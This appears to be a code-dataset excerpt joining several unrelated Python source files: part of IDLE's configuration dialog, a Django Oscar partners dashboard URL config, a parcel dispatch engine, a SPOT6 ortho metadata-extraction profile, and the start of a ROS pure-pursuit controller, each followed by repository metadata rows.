for item in self.changed_items[config_type][section]:
value = self.changed_items[config_type][section][item]
if self.set_user_value(config_type, section, item, value):
cfg_type_changed = True
if cfg_type_changed:
idleConf.userCfg[config_type].Save()
for config_type in ['keys', 'highlight']:
# save these even if unchanged!
idleConf.userCfg[config_type].Save()
self.reset_changed_items() #clear the changed items dict
self.save_all_changed_extensions() # uses a different mechanism
def deactivate_current_config(self):
#Before a config is saved, some cleanup of current
#config must be done - remove the previous keybindings
win_instances = self.parent.instance_dict.keys()
for instance in win_instances:
instance.RemoveKeybindings()
def activate_config_changes(self):
"Dynamically apply configuration changes"
win_instances = self.parent.instance_dict.keys()
for instance in win_instances:
instance.ResetColorizer()
instance.ResetFont()
instance.set_notabs_indentwidth()
instance.ApplyKeybindings()
instance.reset_help_menu_entries()
def cancel(self):
self.destroy()
def ok(self):
self.apply()
self.destroy()
def apply(self):
self.deactivate_current_config()
self.save_all_changed_configs()
self.activate_config_changes()
def help(self):
page = self.tab_pages._current_page
view_text(self, title='Help for IDLE preferences',
text=help_common+help_pages.get(page, ''))
def create_page_extensions(self):
"""Part of the config dialog used for configuring IDLE extensions.
This code is generic - it works for any and all IDLE extensions.
IDLE extensions save their configuration options using idleConf.
This code reads the current configuration using idleConf, supplies a
GUI interface to change the configuration values, and saves the
changes using idleConf.
Not all changes take effect immediately - some may require restarting IDLE.
This depends on each extension's implementation.
All values are treated as text, and it is up to the user to supply
reasonable values. The only exception to this are the 'enable*' options,
which are boolean, and can be toggled with a True/False button.
"""
parent = self.parent
frame = self.tab_pages.pages['Extensions'].frame
self.ext_defaultCfg = idleConf.defaultCfg['extensions']
self.ext_userCfg = idleConf.userCfg['extensions']
self.is_int = self.register(is_int)
self.load_extensions()
# create widgets - a listbox shows all available extensions, with the
# controls for the extension selected in the listbox to the right
self.extension_names = StringVar(self)
frame.rowconfigure(0, weight=1)
frame.columnconfigure(2, weight=1)
self.extension_list = Listbox(frame, listvariable=self.extension_names,
selectmode='browse')
self.extension_list.bind('<<ListboxSelect>>', self.extension_selected)
scroll = Scrollbar(frame, command=self.extension_list.yview)
self.extension_list.yscrollcommand=scroll.set
self.details_frame = LabelFrame(frame, width=250, height=250)
self.extension_list.grid(column=0, row=0, sticky='nws')
scroll.grid(column=1, row=0, sticky='ns')
self.details_frame.grid(column=2, row=0, sticky='nsew', padx=[10, 0])
frame.configure(padx=10, pady=10)
self.config_frame = {}
self.current_extension = None
self.outerframe = self # TEMPORARY
self.tabbed_page_set = self.extension_list # TEMPORARY
# create the frame holding controls for each extension
ext_names = ''
for ext_name in sorted(self.extensions):
self.create_extension_frame(ext_name)
ext_names = ext_names + '{' + ext_name + '} '
self.extension_names.set(ext_names)
self.extension_list.selection_set(0)
self.extension_selected(None)
def load_extensions(self):
"Fill self.extensions with data from the default and user configs."
self.extensions = {}
for ext_name in idleConf.GetExtensions(active_only=False):
self.extensions[ext_name] = []
for ext_name in self.extensions:
opt_list = sorted(self.ext_defaultCfg.GetOptionList(ext_name))
# bring 'enable' options to the beginning of the list
enables = [opt_name for opt_name in opt_list
if opt_name.startswith('enable')]
for opt_name in enables:
opt_list.remove(opt_name)
opt_list = enables + opt_list
for opt_name in opt_list:
def_str = self.ext_defaultCfg.Get(
ext_name, opt_name, raw=True)
try:
def_obj = {'True':True, 'False':False}[def_str]
opt_type = 'bool'
except KeyError:
try:
def_obj = int(def_str)
opt_type = 'int'
except ValueError:
def_obj = def_str
opt_type = None
try:
value = self.ext_userCfg.Get(
ext_name, opt_name, type=opt_type, raw=True,
default=def_obj)
except ValueError: # Need this until .Get fixed
value = def_obj # bad values overwritten by entry
var = StringVar(self)
var.set(str(value))
self.extensions[ext_name].append({'name': opt_name,
'type': opt_type,
'default': def_str,
'value': value,
'var': var,
})
def extension_selected(self, event):
newsel = self.extension_list.curselection()
if newsel:
newsel = self.extension_list.get(newsel)
if newsel is None or newsel != self.current_extension:
if self.current_extension:
self.details_frame.config(text='')
self.config_frame[self.current_extension].grid_forget()
self.current_extension = None
if newsel:
self.details_frame.config(text=newsel)
self.config_frame[newsel].grid(column=0, row=0, sticky='nsew')
self.current_extension = newsel
def create_extension_frame(self, ext_name):
"""Create a frame holding the widgets to configure one extension"""
f = VerticalScrolledFrame(self.details_frame, height=250, width=250)
self.config_frame[ext_name] = f
entry_area = f.interior
# create an entry for each configuration option
for row, opt in enumerate(self.extensions[ext_name]):
# create a row with a label and entry/checkbutton
label = Label(entry_area, text=opt['name'])
label.grid(row=row, column=0, sticky=NW)
var = opt['var']
if opt['type'] == 'bool':
Checkbutton(entry_area, textvariable=var, variable=var,
onvalue='True', offvalue='False',
indicatoron=FALSE, selectcolor='', width=8
).grid(row=row, column=1, sticky=W, padx=7)
elif opt['type'] == 'int':
Entry(entry_area, textvariable=var, validate='key',
validatecommand=(self.is_int, '%P')
).grid(row=row, column=1, sticky=NSEW, padx=7)
else:
Entry(entry_area, textvariable=var
).grid(row=row, column=1, sticky=NSEW, padx=7)
return
def set_extension_value(self, section, opt):
name = opt['name']
default = opt['default']
value = opt['var'].get().strip() or default
opt['var'].set(value)
# if self.defaultCfg.has_section(section):
# Currently, always true; if not, indent to return
if (value == default):
return self.ext_userCfg.RemoveOption(section, name)
# set the option
return self.ext_userCfg.SetOption(section, name, value)
def save_all_changed_extensions(self):
"""Save configuration changes to the user config file."""
has_changes = False
for ext_name in self.extensions:
options = self.extensions[ext_name]
for opt in options:
if self.set_extension_value(ext_name, opt):
has_changes = True
if has_changes:
self.ext_userCfg.Save()
help_common = '''\
When you click either the Apply or Ok buttons, settings in this
dialog that are different from IDLE's default are saved in
a .idlerc directory in your home directory. Except as noted,
these changes apply to all versions of IDLE installed on this
machine. Some do not take affect until IDLE is restarted.
[Cancel] only cancels changes made since the last save.
'''
help_pages = {
'Highlighting': '''
Highlighting:
The IDLE Dark color theme is new in October 2015. It can only
be used with older IDLE releases if it is saved as a custom
theme, with a different name.
''',
'Keys': '''
Keys:
The IDLE Modern Unix key set is new in June 2016. It can only
be used with older IDLE releases if it is saved as a custom
key set, with a different name.
''',
'Extensions': '''
Extensions:
Autocomplete: Popupwait is milleseconds to wait after key char, without
cursor movement, before popping up completion box. Key char is '.' after
identifier or a '/' (or '\\' on Windows) within a string.
FormatParagraph: Max-width is max chars in lines after re-formatting.
Use with paragraphs in both strings and comment blocks.
ParenMatch: Style indicates what is highlighted when closer is entered:
'opener' - opener '({[' corresponding to closer; 'parens' - both chars;
'expression' (default) - also everything in between. Flash-delay is how
long to highlight if cursor is not moved (0 means forever).
'''
}
def is_int(s):
"Return 's is blank or represents an int'"
if not s:
return True
try:
int(s)
return True
except ValueError:
return False
class VerticalScrolledFrame(Frame):
"""A pure Tkinter vertically scrollable frame.
* Use the 'interior' attribute to place widgets inside the scrollable frame
* Construct and pack/place/grid normally
* This frame only allows vertical scrolling
"""
def __init__(self, parent, *args, **kw):
Frame.__init__(self, parent, *args, **kw)
# create a canvas object and a vertical scrollbar for scrolling it
vscrollbar = Scrollbar(self, orient=VERTICAL)
vscrollbar.pack(fill=Y, side=RIGHT, expand=FALSE)
canvas = Canvas(self, bd=0, highlightthickness=0,
yscrollcommand=vscrollbar.set, width=240)
canvas.pack(side=LEFT, fill=BOTH, expand=TRUE)
vscrollbar.config(command=canvas.yview)
# reset the view
canvas.xview_moveto(0)
canvas.yview_moveto(0)
# create a frame inside the canvas which will be scrolled with it
self.interior = interior = Frame(canvas)
interior_id = canvas.create_window(0, 0, window=interior, anchor=NW)
# track changes to the canvas and frame width and sync them,
# also updating the scrollbar
def _configure_interior(event):
# update the scrollbars to match the size of the inner frame
size = (interior.winfo_reqwidth(), interior.winfo_reqheight())
canvas.config(scrollregion="0 0 %s %s" % size)
interior.bind('<Configure>', _configure_interior)
def _configure_canvas(event):
if interior.winfo_reqwidth() != canvas.winfo_width():
# update the inner frame's width to fill the canvas
canvas.itemconfigure(interior_id, width=canvas.winfo_width())
canvas.bind('<Configure>', _configure_canvas)
return
if __name__ == '__main__':
import unittest
unittest.main('idlelib.idle_test.test_configdialog',
verbosity=2, exit=False)
from idlelib.idle_test.htest import run
run(ConfigDialog)
| 46.112903 | 86 | 0.625189 |
4a25849c673bc1461f13ec1608020a6200603d0a | 1,975 | py | Python | oscar/apps/dashboard/partners/app.py | radicalgraphics/django-oscar | 0e15a14a5408007f148f080577486e51702ddcc9 | [
"BSD-3-Clause"
] | null | null | null | oscar/apps/dashboard/partners/app.py | radicalgraphics/django-oscar | 0e15a14a5408007f148f080577486e51702ddcc9 | [
"BSD-3-Clause"
] | null | null | null | oscar/apps/dashboard/partners/app.py | radicalgraphics/django-oscar | 0e15a14a5408007f148f080577486e51702ddcc9 | [
"BSD-3-Clause"
] | null | null | null | from django.conf.urls import patterns, url
from oscar.core.application import Application
from oscar.apps.dashboard.partners import views
class PartnersDashboardApplication(Application):
name = None
default_permissions = ['is_staff', ]
list_view = views.PartnerListView
create_view = views.PartnerCreateView
manage_view = views.PartnerManageView
delete_view = views.PartnerDeleteView
user_link_view = views.PartnerUserLinkView
user_unlink_view = views.PartnerUserUnlinkView
user_create_view = views.PartnerUserCreateView
user_select_view = views.PartnerUserSelectView
user_update_view = views.PartnerUserUpdateView
def get_urls(self):
urlpatterns = patterns('',
url(r'^$', self.list_view.as_view(), name='partner-list'),
url(r'^create/$', self.create_view.as_view(),
name='partner-create'),
url(r'^(?P<pk>\d+)/$', self.manage_view.as_view(),
name='partner-manage'),
url(r'^(?P<pk>\d+)/delete/$', self.delete_view.as_view(),
name='partner-delete'),
url(r'^(?P<partner_pk>\d+)/users/add/$',
self.user_create_view.as_view(),
name='partner-user-create'),
url(r'^(?P<partner_pk>\d+)/users/select/$',
self.user_select_view.as_view(),
name='partner-user-select'),
url(r'^(?P<partner_pk>\d+)/users/(?P<user_pk>\d+)/link/$',
self.user_link_view.as_view(), name='partner-user-link'),
url(r'^(?P<partner_pk>\d+)/users/(?P<user_pk>\d+)/unlink/$',
self.user_unlink_view.as_view(), name='partner-user-unlink'),
url(r'^(?P<partner_pk>\d+)/users/(?P<user_pk>\d+)/update/$',
self.user_update_view.as_view(),
name='partner-user-update'),
)
return self.post_process_urls(urlpatterns)
application = PartnersDashboardApplication()
| 39.5 | 77 | 0.618734 |
4a2586a52f206a50fcdce6475dd847f89f7b5080 | 2,472 | py | Python | dispatch-engine/app/apis/dispatch/engine.py | rednafi/dispatch-engine | fd32d373f9e14e99151f5fcd9b3185f72fed4133 | [
"MIT"
] | null | null | null | dispatch-engine/app/apis/dispatch/engine.py | rednafi/dispatch-engine | fd32d373f9e14e99151f5fcd9b3185f72fed4133 | [
"MIT"
] | null | null | null | dispatch-engine/app/apis/dispatch/engine.py | rednafi/dispatch-engine | fd32d373f9e14e99151f5fcd9b3185f72fed4133 | [
"MIT"
] | null | null | null | """
This is the heart of the source code that makes everything else tick.
Class Description:
------------------
Class Algo implements the parcel dispatch algorithm
Class DispatchEngine applies the algorithm on real data
"""
import csv
from contextlib import suppress
from typing import Any, Dict, Generator, List
class Algo:
"""Parcel dispatch algorithm."""
@staticmethod
def ordered_chunk(seq: list, n: int) -> Generator[List, None, None]:
"""Yield n number of ordered chunks from seq."""
if n == 0:
print("Binsize cannot be zero.")
elif isinstance(n, float):
print("Binsize cannot be a float.")
with suppress(ZeroDivisionError, TypeError):
k, m = divmod(len(seq), n)
return (
seq[i * k + min(i, m) : (i + 1) * k + min(i + 1, m)] for i in range(n)
)
class DispatchEngine:
"""Applies the parcel dispatch algorithm implemented in the class
Algo on real data."""
def __init__(
self, algo: Algo, parcels: List[Dict[str, int]], agents: List[Dict[str, int]],
) -> None:
self.algo = algo
self.parcels = parcels
self.agents = agents
def dispatch(self) -> Generator[List, None, None]:
return self.algo.ordered_chunk(self.parcels, len(self.agents))
@classmethod
def dispatch_hook(cls, algo, parcels, agents) -> Dict[int, Any]:
"""Making this a classmethod is necessary for this task to be
consumed by rq worker."""
instance = cls(algo, parcels, agents)
dispatched = instance.dispatch()
agent_ids = [d["agent_id"] for d in instance.agents]
agent_parcels = {k: v for k, v in zip(agent_ids, list(dispatched))}
return agent_parcels
@classmethod
def send_csv(cls, agent_parcels: Dict[int, Any], filename=None):
"""Converting the output of dispatch_hook into csv."""
fields = ["agent_id", "area_id", "hub_id", "parcel_id"]
with open(filename, "w", newline="") as f:
writer = csv.DictWriter(f, fieldnames=fields)
writer.writeheader()
for agent_id, parcels in agent_parcels.items():
for row in parcels:
row["agent_id"] = agent_id
writer.writerow(row)
# binding the classmethods to make them work like functions
dispatch_hook = DispatchEngine.dispatch_hook
send_csv = DispatchEngine.send_csv
| 30.518519 | 86 | 0.6161 |
4a2586a740a2731d0bf1f994a70c78ba602b283c | 18,671 | py | Python | metadata/profiles/spot6_ortho.py | DREAM-ODA-OS/tools | 66090fc9c39b35b4ef439d4dfe26ac1349d9c5f2 | [
"MIT"
] | null | null | null | metadata/profiles/spot6_ortho.py | DREAM-ODA-OS/tools | 66090fc9c39b35b4ef439d4dfe26ac1349d9c5f2 | [
"MIT"
] | null | null | null | metadata/profiles/spot6_ortho.py | DREAM-ODA-OS/tools | 66090fc9c39b35b4ef439d4dfe26ac1349d9c5f2 | [
"MIT"
] | null | null | null | #!/usr/bin/env python
#------------------------------------------------------------------------------
#
# sensor metadata-extraction profiles - spot6 ortho-product
#
# Project: XML Metadata Handling
# Authors: Martin Paces <[email protected]>
#
#-------------------------------------------------------------------------------
# Copyright (C) 2013 EOX IT Services GmbH
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies of this Software or works derived from this Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
#-------------------------------------------------------------------------------
from .common import (
GDAL_TYPES, OGC_TYPE_DEFS,
check, extract, extattr, isodt
)
import os.path
from .interfaces import ProfileDimap
from lxml import etree
import ns_opt20
#import numpy as np
import geom as ig
from osgeo import ogr; ogr.UseExceptions()
# segmentation threshold
SGLEN = 10000.0 # 10km
def get_mask_element(xml, mtype="Area_Of_Interest (ROI)"):
for elm in xml.iterfind("//Quality_Assessment/Imaging_Quality_Measurement"):
if mtype == extract(elm, "./MEASURE_NAME"):
return elm
return None
def get_multipolygon(fname, sr=None):
#NOTE: GDAL is not able to detect the spatial reference!
geom = ogr.Geometry(ogr.wkbMultiPolygon)
ds = ogr.Open(fname)
if ds is not None and ds.GetLayerCount() > 0:
ly = ds.GetLayer(0)
for ft in (ly.GetFeature(i) for i in xrange(ly.GetFeatureCount())):
_geom = ft.GetGeometryRef()
if "POLYGON" == _geom.GetGeometryName():
if sr is None and _geom.GetSpatialReference() is not None:
sr = _geom.GetSpatialReference()
geom.AddGeometry(_geom.Clone())
geom.Segmentize(SGLEN)
return ig.setSR(geom, sr)
def get_mask(xml, type_="ROI", fname=None):
dname = "." if fname is None else os.path.dirname(fname)
prod_crs = extract(xml, "//Coordinate_Reference_System/Projected_CRS/PROJECTED_CRS_CODE")
title = {
"ROI": "Area_Of_Interest (ROI)",
"CLOUD": "Cloud_Cotation (CLD)",
"SNOW": "Snow_Cotation (SNW)",
"WATER": "Water_Cotation (DTM)",
"VISIBLE": "Visibility_Cotation (VIS)",
}[type_]
msk_elm = check(get_mask_element(xml, title), title)
msk_fname = extattr(msk_elm, "./Quality_Mask/Component/COMPONENT_PATH", "href")
msk_fname = os.path.join(dname, msk_fname)
return get_multipolygon(msk_fname, ig.parseSR(prod_crs))
def get_footprint_and_center(xml, fname=None):
footprint = get_mask(xml, "ROI", fname)
centroid = ig.setSR(footprint.Centroid(), footprint.GetSpatialReference())
return ig.mapToWGS84(footprint), ig.mapToWGS84(centroid)
def get_mask_and_relcover(xml, type_, fname=None):
try:
mask = get_mask(xml, type_, fname)
except ValueError:
return None, None
extn = get_mask(xml, "ROI", fname)
ratio = mask.Area() / extn.Area()
return ig.mapToWGS84(mask), ratio
class ProfileSpot6Ortho(ProfileDimap):
version = "2.0"
profile = "S6_ORTHO"
c_types = {("INTEGER", 16, "UNSIGNED"): "uint16",}
@classmethod
def get_identifier(cls, xml):
""" get dataset's unique identifier """
#pname = extract(xml, "//Dataset_Identification/DATASET_NAME")
mname = extract(xml, "//Source_Identification/Strip_Source/MISSION")
mindex = extract(xml, "//Source_Identification/Strip_Source/MISSION_INDEX")
scode = extract(xml, "//Product_Settings/SPECTRAL_PROCESSING")
idate = extract(xml, "//Source_Identification/Strip_Source/IMAGING_DATE")
itime = extract(xml, "//Source_Identification/Strip_Source/IMAGING_TIME")
dtstr = "".join([idate[0:4], idate[5:7], idate[8:10],
itime[0:2], itime[3:5], itime[6:8], itime[9:10]])
jobid = extract(xml, "//Delivery_Identification/JOB_ID")
return "%s%s_%s_%s_ORT_%s"%(mname, mindex, scode, dtstr, jobid)
@classmethod
def get_parent_id(cls, xml):
""" get collections's unique identifier """
mname = extract(xml, "//Source_Identification/Strip_Source/MISSION")
mindex = extract(xml, "//Source_Identification/Strip_Source/MISSION_INDEX")
iname = extract(xml, "//Source_Identification/Strip_Source/INSTRUMENT")
iindex = extract(xml, "//Source_Identification/Strip_Source/INSTRUMENT_INDEX")
scode = extract(xml, "//Product_Settings/SPECTRAL_PROCESSING")
geom = "ORTHO"
#geom = extract(xml, "//Product_Settings/Geometric_Settings/GEOMETRIC_PROCESSING")
return "%s%s:%s%s:%s:%s"%(mname, mindex, iname, iindex, scode, geom)
@classmethod
def extract_range_type(cls, xml):
subprof = extract(xml, "//Metadata_Identification/METADATA_SUBPROFILE")
if subprof != "PRODUCT":
raise ValueError("Unknown METADATA_SUBPROFILE '%s'"%subprof)
base_name = cls.get_identifier(xml)
nbands = int(extract(xml, "//Raster_Dimensions/NBANDS"))
nbits = int(extract(xml, "//Raster_Encoding/NBITS"))
dtype = extract(xml, "//Raster_Encoding/DATA_TYPE")
dtsgn = extract(xml, "//Raster_Encoding/SIGN")
dtype = check(cls.c_types.get((dtype, nbits, dtsgn)), 'data type')
gdal_dtype = check(GDAL_TYPES.get(dtype), 'data_type')
ogc_dtype = check(OGC_TYPE_DEFS.get(dtype), 'data_type')
nilval = []
for elm in xml.iterfind("//Raster_Display/Special_Value"):
svalidx = extract(elm, "SPECIAL_VALUE_COUNT")
svaltext = extract(elm, "SPECIAL_VALUE_TEXT")
if svaltext == 'NODATA':
nilval.append((0, {
"reason": "http://www.opengis.net/def/nil/OGC/0/inapplicable",
"value": svalidx,
}))
elif svaltext == 'SATURATED':
nilval.append((1, {
"reason": "http://www.opengis.net/def/nil/OGC/0/AboveDetectionRange",
"value": svalidx,
}))
# make sure the no-data goes first
nilval = [obj for _, obj in sorted(nilval)]
band_data = {}
band_ids = []
idx = 0
for elm in xml.find("//Instrument_Calibration/Band_Measurement_List"):
bid = extract(elm, 'BAND_ID')
band = band_data.get(bid)
if band is None:
idx += 1
band = {"bid": bid, "idx": idx}
band_ids.append(bid)
prop = {
'cal_data': extract(elm, "CALIBRATION_DATE"),
'desc': extract(elm, "MEASURE_DESC"),
'unit': extract(elm, "MEASURE_UNIT"),
'uncert': extract(elm, "MEASURE_UNCERTAINTY"),
}
if elm.tag == 'Band_Spectral_Range':
prop.update({
'min': extract(elm, "MIN"),
'max': extract(elm, "MAX"),
})
band['spectral_range'] = prop
elif elm.tag == 'Band_Radiance':
prop.update({
'gain': extract(elm, "GAIN"),
'bias': extract(elm, "BIAS"),
})
band['radiance'] = prop
elif elm.tag == 'Band_Solar_Irradiance':
prop.update({
'value': extract(elm, "VALUE"),
})
band['solar_irradiance'] = prop
band_data[bid] = band
bands = []
for band in (band_data[id_] for id_ in band_ids):
bands.append((band['idx'], {
"identifier": band['bid'],
"name": band['bid'],
"description": "\n".join([
"INFO: Radiance digital numbers.",
"BAND: %s"%band['bid'],
#"BAND_SPECTRAL_RANGE: from %s to %s +/-%s %s"%(
"BAND_SPECTRAL_RANGE: from %s to %s %s"%(
band['spectral_range']['min'],
band['spectral_range']['max'],
#band['spectral_range']['uncert'],
band['spectral_range']['unit'],
),
#"SOLAR_IRRADIANCE: %s +/-%s %s"%(
"SOLAR_IRRADIANCE: %s %s"%(
band['solar_irradiance']['value'],
#band['solar_irradiance']['uncert'],
band['solar_irradiance']['unit'],
),
"UNIT: %s"%band['radiance']['unit'],
"GAIN: %s"%band['radiance']['gain'],
"BIAS: %s"%band['radiance']['bias'],
#"UNCERTAINITY: %s"%band['radiance']['uncert'],
]),
"definition": ogc_dtype,
"data_type": gdal_dtype,
"gdal_interpretation": "Undefined",
"uom": "none",
"nil_values": nilval,
}))
return {
"name": "%s:%d:%s"%(base_name, nbands, dtype),
"bands": [obj for _, obj in sorted(bands)],
}
@classmethod
def extract_range_type_sloppy(cls, xml):
subprof = extract(xml, "//Metadata_Identification/METADATA_SUBPROFILE")
if subprof != "PRODUCT":
raise ValueError("Unknown METADATA_SUBPROFILE '%s'"%subprof)
base_name = cls.get_parent_id(xml)
nbands = int(extract(xml, "//Raster_Dimensions/NBANDS"))
nbits = int(extract(xml, "//Raster_Encoding/NBITS"))
dtype = extract(xml, "//Raster_Encoding/DATA_TYPE")
dtsgn = extract(xml, "//Raster_Encoding/SIGN")
dtype = check(cls.c_types.get((dtype, nbits, dtsgn)), 'data type')
gdal_dtype = check(GDAL_TYPES.get(dtype), 'data_type')
ogc_dtype = check(OGC_TYPE_DEFS.get(dtype), 'data_type')
nilval = []
for elm in xml.iterfind("//Raster_Display/Special_Value"):
svalidx = extract(elm, "SPECIAL_VALUE_COUNT")
svaltext = extract(elm, "SPECIAL_VALUE_TEXT")
if svaltext == 'NODATA':
nilval.append((0, {
"reason": "http://www.opengis.net/def/nil/OGC/0/inapplicable",
"value": svalidx,
}))
elif svaltext == 'SATURATED':
nilval.append((1, {
"reason": "http://www.opengis.net/def/nil/OGC/0/AboveDetectionRange",
"value": svalidx,
}))
# make sure the no-data goes first
nilval = [obj for _, obj in sorted(nilval)]
band_data = {}
band_ids = []
idx = 0
for elm in xml.find("//Instrument_Calibration/Band_Measurement_List"):
bid = extract(elm, 'BAND_ID')
band = band_data.get(bid)
if band is None:
idx += 1
band = {"bid": bid, "idx": idx}
band_ids.append(bid)
prop = {
'cal_data': extract(elm, "CALIBRATION_DATE"),
'desc': extract(elm, "MEASURE_DESC"),
'unit': extract(elm, "MEASURE_UNIT"),
'uncert': extract(elm, "MEASURE_UNCERTAINTY"),
}
if elm.tag == 'Band_Spectral_Range':
prop.update({
'min': extract(elm, "MIN"),
'max': extract(elm, "MAX"),
})
band['spectral_range'] = prop
elif elm.tag == 'Band_Radiance':
prop.update({
'gain': extract(elm, "GAIN"),
'bias': extract(elm, "BIAS"),
})
band['radiance'] = prop
elif elm.tag == 'Band_Solar_Irradiance':
prop.update({
'value': extract(elm, "VALUE"),
})
band['solar_irradiance'] = prop
band_data[bid] = band
bands = []
for band in (band_data[id_] for id_ in band_ids):
bands.append((band['idx'], {
"identifier": band['bid'],
"name": band['bid'],
"description": "\n".join([
"INFO: Radiance digital numbers.",
"BAND: %s"%band['bid'],
"BAND_SPECTRAL_RANGE: from %s to %s %s"%(
band['spectral_range']['min'],
band['spectral_range']['max'],
band['spectral_range']['unit'],
),
]),
"definition": ogc_dtype,
"data_type": gdal_dtype,
"gdal_interpretation": "Undefined",
"uom": "none",
"nil_values": nilval,
}))
return {
"name": "%s:%d:%s"%(base_name, nbands, dtype),
"bands": [obj for _, obj in sorted(bands)],
}
@classmethod
def extract_eop_metadata(cls, xml, ns_opt=None, file_name=None, **kwarg):
""" Extract range definition applicable to all product
of the same type.
"""
ns_opt = ns_opt or ns_opt20
ns_eop = ns_opt.ns_eop
ns_gml = ns_opt.ns_gml
ns_om = ns_opt.ns_om
OPT = ns_opt.E
EOP = ns_eop.E
OM = ns_om.E
#GML = ns_gml.E
time_acq_start = isodt("%sT%s"%(
extract(xml, "//Source_Identification/Strip_Source/IMAGING_DATE"),
extract(xml, "//Source_Identification/Strip_Source/IMAGING_TIME")
))
time_acq_stop = time_acq_start
time_prod = isodt(extract(xml, "//Delivery_Identification/PRODUCTION_DATE"))
# extracting angles and times
for elm in xml.iterfind("//Geometric_Data/Use_Area/Located_Geometric_Values"):
time = isodt(extract(elm, "./TIME"))
if time < time_acq_start:
time_acq_start = time
elif time > time_acq_stop:
time_acq_stop = time
if "Center" != extract(elm, "./LOCATION_TYPE"):
continue
#cnt_row = int(extract(elm, "./ROW"))
#cnt_col = int(extract(elm, "./COL"))
angle_incidence = extract(elm, "./Acquisition_Angles/INCIDENCE_ANGLE")
angle_inc_acrst = extract(elm, "./Acquisition_Angles/INCIDENCE_ANGLE_ACROSS_TRACK")
angle_inc_alngt = extract(elm, "./Acquisition_Angles/INCIDENCE_ANGLE_ALONG_TRACK")
angle_sol_azim = extract(elm, "./Solar_Incidences/SUN_AZIMUTH")
angle_sol_elev = extract(elm, "./Solar_Incidences/SUN_ELEVATION")
break
eo_equipment = EOP.EarthObservationEquipment(
ns_gml.getRandomId(),
EOP.platform(EOP.Platform(
EOP.shortName(extract(xml, "//Source_Identification/Strip_Source/MISSION")),
EOP.serialIdentifier(extract(xml, "//Source_Identification/Strip_Source/MISSION_INDEX")),
EOP.orbitType("LEO"),
)),
EOP.instrument(EOP.Instrument(
EOP.shortName("%s%s"%(
extract(xml, "//Source_Identification/Strip_Source/INSTRUMENT"),
extract(xml, "//Source_Identification/Strip_Source/INSTRUMENT_INDEX"),
)),
)),
EOP.sensor(EOP.Sensor(
EOP.sensorType("OPTICAL"),
)),
EOP.acquisitionParameters(EOP.Acquisition(
EOP.orbitDirection("DESCENDING"),
EOP.illuminationAzimuthAngle(angle_sol_azim, {"uom": "deg"}),
EOP.illuminationElevationAngle(angle_sol_elev, {"uom": "deg"}),
EOP.incidenceAngle(angle_incidence, {"uom": "deg"}),
EOP.acrossTrackIncidenceAngle(angle_inc_acrst, {"uom": "deg"}),
EOP.alongTrackIncidenceAngle(angle_inc_alngt, {"uom": "deg"}),
)),
)
metadata = EOP.EarthObservationMetaData(
EOP.identifier(cls.get_identifier(xml)),
EOP.parentIdentifier(cls.get_parent_id(xml)),
EOP.acquisitionType("NOMINAL"),
EOP.productType("IMAGE"),
EOP.status("ACQUIRED"),
)
result = OPT.EarthObservationResult(
ns_gml.getRandomId(),
)
mask_cloud, ratio_cloud = get_mask_and_relcover(xml, "CLOUD", file_name)
mask_snow, ratio_snow = get_mask_and_relcover(xml, "SNOW", file_name)
if mask_cloud is not None:
result.append(ns_eop.getMask("CLOUD", "VECTOR", geom=mask_cloud))
if mask_snow is not None:
result.append(ns_eop.getMask("SNOW", "VECTOR", geom=mask_snow))
if ratio_cloud is not None:
result.append(OPT.cloudCoverPercentage("%.4f"%(ratio_cloud*100), {"uom":"%"}))
if ratio_snow is not None:
result.append(OPT.snowCoverPercentage("%.4f"%(ratio_snow*100), {"uom":"%"}))
xml_eop = OPT.EarthObservation(
ns_gml.getRandomId(),
ns_eop.getSchemaLocation("OPT"),
#EOP.parameter(), #optional
OM.phenomenonTime(ns_gml.getTimePeriod(time_acq_start, time_acq_stop)),
#OM.resultQuality(), #optional
OM.resultTime(ns_gml.getTimeInstant(time_prod)),
#OM.validTime(), # optional
OM.procedure(eo_equipment),
OM.observedProperty({"nillReason": "unknown"}),
OM.featureOfInterest(
ns_eop.getFootprint(*get_footprint_and_center(xml, file_name))
),
OM.result(result),
EOP.metaDataProperty(metadata),
)
xml_eop = etree.ElementTree(xml_eop)
#xml_eop.getroot().addprevious(ns_eop.getSchematronPI())
return xml_eop
| 42.146727 | 105 | 0.557817 |
4a2587189f08a9a33226d3f5deb5fa42c4bd910b | 12,461 | py | Python | ros/catkin_ws/src/puzzlebot_nav2d/src/pure_pursuit_bt_template.py | robotica-cem/mobile-robots-module | 892b464178d417182e3765d44aa5a84c22730298 | [
"BSD-2-Clause"
] | null | null | null | ros/catkin_ws/src/puzzlebot_nav2d/src/pure_pursuit_bt_template.py | robotica-cem/mobile-robots-module | 892b464178d417182e3765d44aa5a84c22730298 | [
"BSD-2-Clause"
] | null | null | null | ros/catkin_ws/src/puzzlebot_nav2d/src/pure_pursuit_bt_template.py | robotica-cem/mobile-robots-module | 892b464178d417182e3765d44aa5a84c22730298 | [
"BSD-2-Clause"
] | 2 | 2022-03-09T16:57:15.000Z | 2022-03-11T18:39:31.000Z | #!/usr/bin/env python
import sys
import rospy
import numpy as np
from functools import partial
import tf2_ros
import geometry_msgs.msg
from tf2_geometry_msgs import PointStamped
import py_trees
def go_to_point_controller(x, y, vmax, Kth, alpha):
"""
Calculates the desired linear- and angular velocities to move the robot to a point.
Used for the final step in the pure pursuit to approach and stay at the goal position.
Arguments
---------
x : float
The x-coordinate of the goal in the reference frame of the robot, in m
y : float
The x-coordinate of the goal in the reference frame of the robot, in m
vmax : float
The maximum linear velocity, in m/s
Kth : float
Gain for the direction controller
alpha : float
Parameter for calculating the linear velocity as it approaches the goal
Returns
---------
w : float
The angular velocity in rad/s
v : float
The linear velocity in m/s
d : float
